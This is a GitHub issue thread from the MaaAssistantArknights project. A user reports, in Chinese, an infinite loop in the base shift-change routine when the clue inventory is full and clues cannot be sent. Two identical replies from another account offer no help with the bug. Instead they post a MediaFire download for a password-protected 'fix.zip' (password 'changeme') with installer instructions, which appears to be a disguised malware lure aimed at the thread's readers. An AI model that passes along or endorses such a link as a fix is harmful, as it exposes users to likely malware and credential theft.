### ISSUE TITLE
送线索领线索无限循环

### ISSUE THREAD

**Issue by why002** [MaaAssistantArknights/MaaAssistantArknights#10372]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

基建换班，线索已满领不了线索，maa送线索却无法送出

### Version

Resource Version: 太阳甩在身后
UI Version: v5.6.0-beta.1
Core Version: v5.6.0-beta.1

### 日志和配置文件

[asst.log](https://github.com/user-attachments/files/16743323/asst.log)
[gui.log](https://github.com/user-attachments/files/16743324/gui.log)
2024/8/26 10:10

### 配置信息

Windows 11 Pro 23H2
MuMu12 截图增强已开启

### 截图或录屏

![MuMu12-20240826-103350](https://github.com/user-attachments/assets/2c9b8c35-dfe1-4040-8e01-34aa552cf7ad)
![MuMu12-20240826-103356](https://github.com/user-attachments/assets/65a30938-ea7b-475a-88ac-d503f8a95b88)

### 还有别的吗？

重启后无法复现

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
